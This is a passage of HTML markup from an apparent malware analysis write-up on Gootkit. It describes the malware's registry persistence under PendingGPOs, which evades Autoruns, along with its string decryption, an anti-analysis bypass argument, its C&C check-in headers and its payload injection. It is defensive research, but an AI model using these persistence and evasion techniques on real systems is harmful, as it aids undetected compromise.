    style=&quot;padding-bottom: 31.770833333333332%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7klEQVR42n3I646DIBCGYe///nZj3VYBDyBSDiNSOSiLzaY/N3ny5Z2pejShWuJGzgSMXCf2HAZedvfnx2s/PvHuw71SOSu+zFyMi5i4oMFZAGWMEnIBMCvAul6MVgDaOWe0fIpFa1U+x3FU4hv1X3Fs4vQThzowHKxNFpJUvlDaaxO1DiUMxNIGkt1Ou+XN5Uq0BBFFiCREISTbjrMZpNjabi6N0IKx7Lpn2/ICdYrRHSAbc6loz6fajzc/PwK7e3oP0y3SJkqSrc4hZe9PH/MlFOd7/1SMsr5jI+ZsXHpMBzzzUQpmks8p5vP8zy/vNlJUZvAuqgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit18&quot;
        title=&quot;&quot;
        src=&quot;/website/static/facf0759d4faf7986413da479d1a5df4/08115/gootkit18.png&quot;
        srcset=&quot;/website/static/facf0759d4faf7986413da479d1a5df4/804b2/gootkit18.png 384w,
/website/static/facf0759d4faf7986413da479d1a5df4/08115/gootkit18.png 504w&quot;
        sizes=&quot;(max-width: 504px) 100vw, 504px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Then it creates 3 different registry keys (“Count”, “Path1” and “Section1”) inside “HKCU\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs” with the purpose to allow the threat to execute on reboot.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1209px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/dd4ab2c83a8422a3359f1b0bea69d19e/8a69d/gootkit19.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 11.197916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAd0lEQVR42i3CSwrCMBAA0N7/Qm66L1JBGhgVv9Gk+Y9xmiitJdSNj1fBuoFNcweIirNT17b1cVszvooBUN2C4tc92I4lNOlpBjSEmsJ/ZcU56kc2einJCdtLMSK5VygjFdIflOpyWHbwJZexT15O5Obsp8HP7/ADHWtr02OSehAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit19&quot;
        title=&quot;&quot;
        src=&quot;/website/static/dd4ab2c83a8422a3359f1b0bea69d19e/8a69d/gootkit19.png&quot;
        srcset=&quot;/website/static/dd4ab2c83a8422a3359f1b0bea69d19e/804b2/gootkit19.png 384w,
/website/static/dd4ab2c83a8422a3359f1b0bea69d19e/e5715/gootkit19.png 768w,
/website/static/dd4ab2c83a8422a3359f1b0bea69d19e/8a69d/gootkit19.png 1209w&quot;
        sizes=&quot;(max-width: 1209px) 100vw, 1209px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;It seems that this technique was reported to be used &lt;strong&gt;&lt;strong&gt;only&lt;/strong&gt;&lt;/strong&gt; by Gootkit.&lt;/p&gt;
&lt;p&gt;Famous security tools still can’t detect this mechanism even if it has been used for months.&lt;/p&gt;
&lt;p&gt;For example, the famous SysInternal Autoruns tool, that should be able to show all the programs that are configured to run on system bootup or login, fails the detection of this persistence method.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1301px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3c809901540208cc015e340e70685a59/07e9f/gootkit20.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 29.947916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAIAAABM9SnKAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA80lEQVR42mVPXY+DIBDk//+xS5PLPXgvrVcVFFEEtEHlQ0BvvSZNk5uHyewys7sgXOY1bnjPpZBKjsBmNfu+82G4fGak6UhDadsJNepl1fN68mJAzKtBjGScK9kPnHEpleACvNu2tS37uHxRysoS57d7QWhVkZbWuMI1IRjjpqFoYNfV+EVrayxkvPew+TiOfhD5TwHCee+cDzGBIaX4tG1bsNahlnw7Fx6PKaV0/AFuNtYS1t+LMu3JGKgABiYfb4gxIlpl06Th7RUGpBilUqznp04phAAj3g3PPhLdrWNsnpdXFzYDSzXC70BAEpach/7DL4ibVFZMDfdVAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit20&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3c809901540208cc015e340e70685a59/07e9f/gootkit20.png&quot;
        srcset=&quot;/website/static/3c809901540208cc015e340e70685a59/804b2/gootkit20.png 384w,
/website/static/3c809901540208cc015e340e70685a59/e5715/gootkit20.png 768w,
/website/static/3c809901540208cc015e340e70685a59/07e9f/gootkit20.png 1301w&quot;
        sizes=&quot;(max-width: 1301px) 100vw, 1301px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Stepping through the code, we noticed that, at runtime, Gootkit decrypts the strings it uses with a custom algorithm to evade static analysis detection of anomalous behaviour.&lt;/p&gt;
&lt;p&gt;It’s a combination of “stack strings”, XOR commands and the modulo operation.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 733px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/f0f123b938d4ac858f6ccfaba791afe7/00b70/gootkit21.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 35.15625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABYElEQVR42jWOXWvbMBSG/d8Hg+1PjN0NetEytl507eUotF0zk8i2rOjT+rDsyJbjuHXSpZoCLTyci3N4z/MmQXINFunyZ1Z8V+vrsrwC+If1LBzG2VuJi6Yi21ZGwuzDfjjNd5JXZ0yF4MPlCly28jelN5n+NY5VOOwmp0W55MVS4bwROOanvj4+9+Hw9iIJkjUI5OnZI/6C4DdGLgi56Do974enTtc4M+tVr6m3YqPozumX3SbyHma4JjADd1KjFvOGa86QMqLxdfT0VnS12G3U1JnJmWdv520TOfXfD0kQpGYIpI+sKabO7gc3+vbgrB/b0WmSpSRPBVoZVnaa9bVwhkX/uFHxmoQKW06WKYQy66UaGtcabr3697KNHkUKTaEVqOZlzMzbNi6PT33s/BprH3MkweLr/fl9+jnPPj0sPt6BDzm97RqjWZmnf+DqL4VA4IKvc0nLikJBTkgC/wObInX1Ce6siAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit21&quot;
        title=&quot;&quot;
        src=&quot;/website/static/f0f123b938d4ac858f6ccfaba791afe7/00b70/gootkit21.png&quot;
        srcset=&quot;/website/static/f0f123b938d4ac858f6ccfaba791afe7/804b2/gootkit21.png 384w,
/website/static/f0f123b938d4ac858f6ccfaba791afe7/00b70/gootkit21.png 733w&quot;
        sizes=&quot;(max-width: 733px) 100vw, 733px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;An exhaustive explanation of the decryption routine can be found here:&lt;a href=&quot;https://paper.tuisec.win/detail/1f762a57f618c6e&quot;&gt;link&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Skipping further, eventually there’s a call to “CreateProcessW” to start a new instance of Gootkit with the following parameter: &lt;em&gt;&lt;strong&gt;--vwxyz&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;6.Stage 3: Check-in phase&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Quickly we found out that executing the malware with the cited parameter allows us to skip all the previous anti-analysis controls to get into the part of the code that starts to contact the Command &amp;#x26; Control Server.&lt;/p&gt;
&lt;p&gt;The first check-in to home is done to the following URL via HTTPS:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1158px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/14422bc39901fbb9b7ff784323e8c293/1132d/gootkit22.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 78.38541666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAIAAACZeshMAAAACXBIWXMAABYlAAAWJQFJUiTwAAACWUlEQVR42nWSfWvTUBTG+11FdAy/h3848G2CIoKiKMIQBKkirXNpt7brunVtUtu0jWmTdsnNvTfv7831ZHXdOufh4XBz4Xefc05OwbJtSol5HpTkQQmFwAY2TSsMw+D/UbCsnMkFAMaGYRCMQQZC8JDnee5N4ft+DvO8UG80DpuHtXqdq1Qq1f2r4irVf7XHVcCJMVZotoX6icAPZWE0/X1GZtSbX5e/fvBn1I+SNIfFyXyoohlxFewATILUipkZMsj5IVopg7y6SRYsh4XRpNkd9CR1pKIJMmXdnCILNJho4zkGwT0o/5zhoYJkjZIg+wuL8rxY5nYPmh1RPuJFeIUfKYbjB4z5GYNMw4XhJthLsb8wzjMNL5yJFzbavw5a3acvXt26s3F3897tjc2tJ8/e73x++/HTmw870IuTwBPZsmAgL2HkRODZ7ktfy9yXEnckKuAMjdROhNoxX22ewoSAAU8SLGiQrcGGEx33RlDwaV9q8WJL0rojBSavGDYNUuSEU2QqyIYpTDTzzAzgIRJcwJrpg0/jROAax99/7nO1IxU7uh1pdgh9IjdBTgzmE92CG2gebMnKWbcCcG4Jw3Z/3Jfnuh2A51g1YKr5YYZ0J4ASVOwu275etiCpXVEulrhvu9W9eqtUqcMUxKkOgj8kzYg0x7AeK/ISxl7c7PSh25ev3z14vP1w+/n9rUfF8h5yY3BbLhw0AvXfAPfGSvFHtTOQYQegKztlTsrMOFtuWL5S55lGeatL4ZDFS9gJE2S6oDNsadRyo4UbZV6ceQm7Kn9daZbDfwAcgmON/uqTfQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit22&quot;
        title=&quot;&quot;
        src=&quot;/website/static/14422bc39901fbb9b7ff784323e8c293/1132d/gootkit22.png&quot;
        srcset=&quot;/website/static/14422bc39901fbb9b7ff784323e8c293/804b2/gootkit22.png 384w,
/website/static/14422bc39901fbb9b7ff784323e8c293/e5715/gootkit22.png 768w,
/website/static/14422bc39901fbb9b7ff784323e8c293/1132d/gootkit22.png 1158w&quot;
        sizes=&quot;(max-width: 1158px) 100vw, 1158px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;As we can see from the image, many headers were added to the request to send different informations of the infected machine to the C&amp;#x26;C Server.&lt;/p&gt;
&lt;p&gt;In particular one of the headers caught my attention: “ X-IsTrustedComp”. Digging into the code we found that the value would be set to “1” if an environment variable called “crackmeololo” was found in the host, “0” otherwise.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1166px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/acf24c5268c9e13bb0311d62fa0c1811/077b7/gootkit23.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 22.65625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAAA/klEQVR42m3M206DMACAYd7/NTQxXhq90LjERJMhMjqWcRoM2Di0HDo7WNtxKNQ744X//fcrd7c3i5dnoOsrTfdsxwRr0wD6p7YBwNluOedSynme5X8ptuUcPH+jrbbg61zHZebBxE4jFx0jjNJx6MU8CzH9Nb8nZRl8uLt3GBtp9nQibw01KFPPOCAlOsEDSqK6yHAJ8yyNwzBPjlWByrIoEEQwV17BQxwuylDdR/dZ/ti0iexaXsU9Plyhz9Be0Gq81L5rwb3TLFXmWJSg0DZDe60c8WVg3cRHzgvKgusVy2kYGBkpGZpaMCJFJ6e+Id+UYJnkEmMx8JbgC8E/zIoPZIK4kGMAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit23&quot;
        title=&quot;&quot;
        src=&quot;/website/static/acf24c5268c9e13bb0311d62fa0c1811/077b7/gootkit23.png&quot;
        srcset=&quot;/website/static/acf24c5268c9e13bb0311d62fa0c1811/804b2/gootkit23.png 384w,
/website/static/acf24c5268c9e13bb0311d62fa0c1811/e5715/gootkit23.png 768w,
/website/static/acf24c5268c9e13bb0311d62fa0c1811/077b7/gootkit23.png 1166w&quot;
        sizes=&quot;(max-width: 1166px) 100vw, 1166px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;That seems another “escaping” mechanism implementing by the author, probably to stop the infection chain for his own debugging purposes.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;7.Last stage&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;The response that arrives from the previous connection contains the final stage of Gootkit, configured to work properly on the infected machine.&lt;/p&gt;
&lt;p&gt;The malware dynamically loaded “RtlDecompressBuffer” call to use it to decompress the payload; then, it injected into an area of the current process memory.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1127px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/237f42dd90b20dfca6e10f883a4f77f2/dcccd/gootkit24.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 32.55208333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAIAAACHqfpvAAAACXBIWXMAAAsTAAALEwEAmpwYAAABZUlEQVR42hWQXa+TMACG+f+3xnt/hDHGGHM0x6MmixM8A0bp6Be0lJa2tNv42IaYvHdPnjzJG31985bmB5jGFS7ep2m+B/DwPSPvJH/WDJkauo451QTNG4bx33goC84qTiureCQ5cg31Hbt4tQNIN8JywMVTsMnU14thj9Gus19vQUpm0mQFR6uo6+h685FgpUJlh0vvxAs4sILgPC7Ih+DiqWdLz25ebltHa7WwBF5rNPpuHGQwTSQobE/FIOsNl9meFJTkDRJsnc9jh2eFFiduQ7tRp4VkJ8PRaPjs5OJk1FLYM+RbsoR+t5Xxjxr9wjy+j3bSdOnp49KvV7tObtCCE6ApGDs2qfq+yYJBQ3FQzf3qkmNKq1eBiqrJ7/PwX9bkcTWbuS7edBwekyLft/XJSNq3NKpARsCRVaBGJcxSVAJ6QlK1l0EHLbaTz06dnZ6CoQh+/vTx29OXny/Pf37vstfkHx7peVmamGIBAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit24&quot;
        title=&quot;&quot;
        src=&quot;/website/static/237f42dd90b20dfca6e10f883a4f77f2/dcccd/gootkit24.png&quot;
        srcset=&quot;/website/static/237f42dd90b20dfca6e10f883a4f77f2/804b2/gootkit24.png 384w,
/website/static/237f42dd90b20dfca6e10f883a4f77f2/e5715/gootkit24.png 768w,
/website/static/237f42dd90b20dfca6e10f883a4f77f2/dcccd/gootkit24.png 1127w&quot;
        sizes=&quot;(max-width: 1127px) 100vw, 1127px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Afterwards the flow of execution is transferred to the start of the injected code.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 825px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/5f05fa57c3d73bdcd215c48ce53c64f8/d4c13/gootkit26.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 75.26041666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAIAAABr+ngCAAAACXBIWXMAAAsTAAALEwEAmpwYAAACwElEQVR42j2Saa+bOBiF+f8f+n00P6HqdKp+qaredpK7J5cQwhbAZjOLMZvNFggkjNPOVHr06kj28bGOXiE1qqGkGURfPn/cPK+gqjiaihM3hObmZSXrD0ng+R6IkJ1GkEReFnt54v9CWGZ6HauO4Rg5LU3L0McITEN57lLb/Mu2PlASlRnOWHw5s8vIrlOzzO2NqRGWE12GqsSBa6mUBBhayNS7Li2IK+/vjuKja4bA0LZIGbtsqrMxD84FGog310RYBm6mXYVDx6zzsAzc2LXaDjeF7xjfgP4do9DzAUztc5/PbT6xZK7xRONrl9/M11PFsjAABssQdszYPfKQvkSK+rehfkoRyqMIEJebL315Hdgy1jcG9jN5ZDU3Q4NmqPDd8KhXDJHEMvYvtqg4x1A63O0jZe6yS8fNt/s3Birw2Oup7KqEf5snU+TnDiyToCAAqu8t7VMbYdf5M42/LmM7tflcp5eG8HntC2E519eRUYI8W+fJmQtj/Zh6oMDAOHzWpO/UySzt3dH+g1c9Nbwwnxc2Epc/ITRF1ORRnUceNJEHAmDZuuK6duQD7bDS5KfAABHUCJabKm1p3tflL7q6EIrEa8v4cqrmvjq3xdSXJ0baEveMjE01tXRosqEpBlYMdX450bm/wcXUV8Lm9VmVZeltq8h7aSfe9O5NPez3kijvNtvne0PT+Ikm7VR5D2wLApvDReB7wsM/X+/Xd4/S/Vr68XBY37/9eJTXT+LqVVw/iitD3yvy1od6UyY0C3/D8jBCrnAQn4AsppoaW0aOfAJh6jupBzPHzXyvwXHp+B3By6Vdzg1fyf+Y266phJeHb/B1Vymg1GCmA6yYydEkFozNY6jo+ZsdbXQWBMtc/9yI/znThuaCuH3WdhKQdeugIggix+EzdYMYuhFwEsuLjpB4AasILdLfsCJNcfwvgRsjfHvcoSMAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit26&quot;
        title=&quot;&quot;
        src=&quot;/website/static/5f05fa57c3d73bdcd215c48ce53c64f8/d4c13/gootkit26.png&quot;
        srcset=&quot;/website/static/5f05fa57c3d73bdcd215c48ce53c64f8/804b2/gootkit26.png 384w,
/website/static/5f05fa57c3d73bdcd215c48ce53c64f8/e5715/gootkit26.png 768w,
/website/static/5f05fa57c3d73bdcd215c48ce53c64f8/d4c13/gootkit26.png 825w&quot;
        sizes=&quot;(max-width: 825px) 100vw, 825px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The final payload is a DLL file that is bigger than 5MB because it contains the Node.js engine which is probably needed to run some embedded javascript files. At this time we decided to stop our analysis and leave the rest to future work.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;8.Additional findings&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;While debugging, we noticed that Gootkit does not check only if a parameter called “ --vwxyz” was passed to the command line. Also it checks if other 3 parameters:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 596px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3a1a1fa25087aac109ce572d75478196/699b7/gootkit27.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 155.46875%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAfCAIAAABoLHqZAAAACXBIWXMAABYlAAAWJQFJUiTwAAADhklEQVR42o2VaXPiOBCG+f8/Zmo/7WztZoYAvsFhtjABAwY74ANjfB/yJW0LQiCTGTauLtlW+VW3uh+1OwihOI7zPNd1fbfdmqa5UNUgCAghGGNy9+okSeK6ru8HDMdJT0+sKA44Ngg/J65LVOYpIS2pKpLlJC9IgUhb3TPyumjH3CzHXB9XUfQ8sR77zoB1WK4M96QMcREQFBIUvLMyJJeIOrvNciJxpE5S9Xk/4DxOPLB8FR9IHReBEx92pIxgFYwijEKcgz66ii1jrQyp+Lh43vD8iyQaAo9CF2biwxbE3k7baTNjqWzmk6Olw1o3ntfLEdPFTVpOlLQrJAMhexg0wYFUUZP74K3JjnXqVckBwqEbuRVD1Mz3P9oqKtRnn+HD4dAXxDb2aLR0wyH9+s3ozI14u17IbJc0yXY1HfJ9WWQEtpdBwqpzwoJ7CUNZHHsWqdIidPPAzXwHXpsc/CS/sfQqPt/OPMDYNA359NUJw9ACJi3rz69fpeHwn4eHuap+Bi8qxqcLHOZJUqMSpWkFkH3Ss6lrk6GAm6zeLHNBQqOnQh63iU+qhCb2ZPhiNNsNuootQ6OQVMnLaiqJjDzi5SGfAiRQKlqeEApOmhSAg4rQ17q48Wxo0xEPPGWr2VEQfEkEqwMgLM59G0UucGZqM8/c2Bs1PVqkLa9iqPNo0MV1Wk8V1OdRjy27DKaExWXktrkPbAGksErimYDau7CNlcI/UsLISiXDER6PYSShd0UKxjqBtU5ZeB/2dr2U2UfYVaIq7mBw4Fmn16v8Pd3q65G8MZi5Fce+a+sqLB/sX6ztam9qlrGs0uOF5LviM2CXV/z6jNvf2xWeThRFtu1omsZzPIww1Tbvvrjbw+oaGqjv+2tdP4bhbRj/L0ZppC/mRZGRJMbqEs9UPJvjw540BT1AVYap0Qca809iOIBS/1seutFuPWF6M5FVOCawdVIDj6e+AWyBAVtt/VHsKLKA4kPqGNpI1GVJE7nEeQFBA90npmwAJDXkH/98WjuRZ4u9bgZ9xzKqAV+xQv2th/U1aVMUOJlv743Fbj2vEu8X4tgze39/iQObihmu+vGj5kRsbWmoUFgAC/ACg/jbX4gtof9X6tsQ9lxgV7I055nI3YHs3PRxcen+Hz2nwUH9Vwbu0+NuMR0vlSdlLHnWKWGF/671fRTTArz9hHBNvwC7+4t6E/8HfdDer8YGTogAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit27&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3a1a1fa25087aac109ce572d75478196/699b7/gootkit27.png&quot;
        srcset=&quot;/website/static/3a1a1fa25087aac109ce572d75478196/804b2/gootkit27.png 384w,
/website/static/3a1a1fa25087aac109ce572d75478196/699b7/gootkit27.png 596w&quot;
        sizes=&quot;(max-width: 596px) 100vw, 596px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Pretty strange thing. We haven’t found the malware to actively use these arguments yet. However, stepping through code we discovered that:&lt;/p&gt;
&lt;p&gt;1 - the “--&lt;em&gt;&lt;strong&gt;reinstall&lt;/strong&gt;&lt;/em&gt;” command leaded the execution to some curious code. First, the malware used “CreateToolHelp32Snapshot” to retrieve a list of the current running processes.&lt;/p&gt;
&lt;p&gt;Then, it iterated through the retrieved list via “ Process32FirstW” and “Process32NextW” with the aim to get a handle to the active “explorer.exe” instance.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1164px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/97905ddd82b400cc31157fca85498772/d74fe/gootkit28.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 26.822916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAABYlAAAWJQFJUiTwAAABC0lEQVR42g3OS3KCMAAAUO6/7fQI9gTt1umirR/qWEUlGElICAkk5AMkfse2nuC96Oh0OZ8NFRUYWVXyptxmqAYS5iATy5MvbkH+ntzfpeutojjP4b7T0kgxuDYKbQPfXi0EkiBvGavZJF22JVZ8xdWn77dnwy4tufdCcUL2CVrGg2JVnpqaRt7IcvGQCYOga1knQAJG2WaUbF5gFR99cx3kPZh70EZWVhS+gCfb9Ir1WkSO8/HTM46nFKZNkSEE33+meJdUeF6KL9dyw6AhwFVQcpqDBO3Wgh50TYNTke8sPDwOrC2p1bxuUAo/KJpgMq71+hr6c68v3tyCc1p+z2aLON5tkmS1IgX+B7eiCS5BhAuuAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit28&quot;
        title=&quot;&quot;
        src=&quot;/website/static/97905ddd82b400cc31157fca85498772/d74fe/gootkit28.png&quot;
        srcset=&quot;/website/static/97905ddd82b400cc31157fca85498772/804b2/gootkit28.png 384w,
/website/static/97905ddd82b400cc31157fca85498772/e5715/gootkit28.png 768w,
/website/static/97905ddd82b400cc31157fca85498772/d74fe/gootkit28.png 1164w&quot;
        sizes=&quot;(max-width: 1164px) 100vw, 1164px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
